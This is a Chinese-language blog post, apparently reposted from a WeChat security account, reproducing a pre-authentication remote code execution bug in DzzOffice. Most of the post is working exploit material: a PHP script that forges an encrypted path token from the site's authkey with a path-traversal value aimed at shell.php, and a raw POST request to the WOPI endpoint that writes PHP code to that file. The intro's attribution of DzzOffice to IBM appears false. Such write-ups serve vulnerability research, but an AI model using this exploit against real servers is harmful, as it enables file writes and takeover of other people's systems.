dzzoffice 前台RCE复现

  • A+
所属分类:代码审计

简介

 

DzzOffice是美国IBM(DzzOffice)公司的一个可提供在线协同办公套件功能的平台。该平台可为用于提供在线文档、表格、网盘、演示等功能。

 

环境搭建

https://github.com/zyx0814/dzzoffice/releases/

dzzoffice 前台RCE复现

dzzoffice 前台RCE复现

安装完成

dzzoffice 前台RCE复现


漏洞复现

 

首先需要获取到authkey 我现在的环境的key为:c93fa4WvJjY4l8C8


加密的脚本

<?phpfunction authcode_config($string,$key, $operation = 'DECODE', $expiry = 0){$ckey_length = 4;$key = md5($key);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string);$result = '';$box = range(0255);$rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc.str_replace('=', '', base64_encode($result));}}echo base64_encode(authcode_config("disk::..././..././..././shell.php",md5('c93fa4WvJjY4l8C8'),'ENCODE'));

dzzoffice 前台RCE复现

构建数据包并发送

POST /dzzoffice/core/api/wopi/index.php?access_token=1&action=contents&path=M2Q3OWxMSm84dHArN0srbHc1dmx3Ym0zVVN5elpxM09sb2hTS0tIbitadW42ak9BaU1EZnZxUlRIT0NTR09lNjUrbkVXU3FyZzd4c3g0NURDc0k= HTTP/1.1Host: 192.168.1.103Content-Length: 18Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://word.comReferer: http://word.com/user.php?mod=loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close <?php phpinfo();?>

dzzoffice 前台RCE复现

dzzoffice 前台RCE复现


本文始发于微信公众号(锋刃科技):dzzoffice 前台RCE复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: